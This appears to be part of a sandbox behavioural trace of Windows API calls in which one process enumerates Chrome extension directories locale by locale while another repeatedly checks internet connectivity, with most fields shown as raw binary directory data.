| 07:44:27,083 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@M\xbak\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01@M\xbak\xe0\x91\xcf\x01@M\xbak\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@M\xbak\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01W\x01\x00\x00\x00\x00\x00\x00X\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,083 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,083 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,234 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,234 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@M\xbak\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01p\xd4\xbbk\xe0\x91\xcf\x01p\xd4\xbbk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xd4\xbbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01>\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,234 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,234 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,304 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:27,304 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:27,304 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:27,304 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:27,304 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:27,314 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,314 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xd4\xbbk\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01p\xd4\xbbk\xe0\x91\xcf\x01p\xd4\xbbk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xd4\xbbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01A\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,314 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,314 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,394 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,394 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xd4\xbbk\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xa0[\xbdk\xe0\x91\xcf\x01\xa0[\xbdk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0[\xbdk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01[\x01\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,394 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,394 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,474 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\sv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,474 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0[\xbdk\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xa0[\xbdk\xe0\x91\xcf\x01\xa0[\xbdk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0[\xbdk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01=\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,474 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,474 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,554 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,564 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xe2\xbek\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xe2\xbek\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01u\x01\x00\x00\x00\x00\x00\x00x\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,564 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,564 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xe2\xbek\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00r\x00_\x00T\x00W\x00h\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u\x00k\x006\x00-\x003\x00h\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,564 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,644 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,644 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xe2\xbek\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\xd0\xe2\xbek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xe2\xbek\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01>\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,644 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,644 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,724 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,724 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01a\x01\x00\x00\x00\x00\x00\x00h\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,724 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,724 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,814 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,814 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00j\xc0k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xc0k\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01K\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,814 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,814 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,895 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,895 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xf1\xc1k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x010\xf1\xc1k\xe0\x91\xcf\x010\xf1\xc1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xf1\xc1k\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x016\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,895 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,895 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,975 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00`x\xc3k\xe0\x91\xcf\x01P\x1c\xcbk\xe0\x91\xcf\x01`x\xc3k\xe0\x91\xcf\x01`x\xc3k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`x\xc3k\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x01\x90r\xddk\xe0\x91\xcf\x016\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,975 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,065 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:28,065 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x03\xdbn\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00`\x7f\x88n\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01P \xc1n\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x12\x000\x000\x006\x00~\x001\x00.\x001\x00_\x000\x00\x00\x00\x00\x00\x00\x000\x00.\x000\x00.\x006\x00.\x001\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,065 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,105 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:28,105 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:28,105 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:28,105 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:28,105 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:28,155 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:28,155 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x7f\x88n\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01P \xc1n\xe0\x91\xcf\x01p\x1a\xfbn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0\x88\x00\x00\x00\x00\x00\x00\x000\xde\xb7n\xe0\x91\xcf\x01Lw\xb7n\xe0\x91\xcf\x01\x00D\xebb\xfc,\xcf\x010\xde\xb7n\xe0\x91\xcf\x01\x95\xee\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x16\x00C\x00R\x00A\x00W\x00_\x00B\x00~\x001\x00.\x00J\x00S\x00\x00\x00c\x00r\x00a\x00w\x00_\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00j\x00s\x00\xd8k\xe0\x91\xcf\x01\x80\x00\x00\x00\x00\x00\x00\x00`e\xb9n\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:28,165 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,415 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\css\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:28,415 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`e\xb9n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x90\xec\xban\xe0\x91\xcf\x01\x90\xec\xban\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00T\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xec\xban\xe0\x91\xcf\x01\xac\xd2\xban\xe0\x91\xcf\x01\x00\xfb)\x91\x0c\xe0\xce\x01\x90\xec\xban\xe0\x91\xcf\x01\xcd\x06\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00R\x00A\x00W\x00_\x00W\x00~\x001\x00.\x00C\x00S\x00S\x00c\x00r\x00a\x00w\x00_\x00w\x00i\x00n\x00d\x00o\x00w\x00.\x00c\x00s\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,415 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,425 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,515 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\html\*.* |
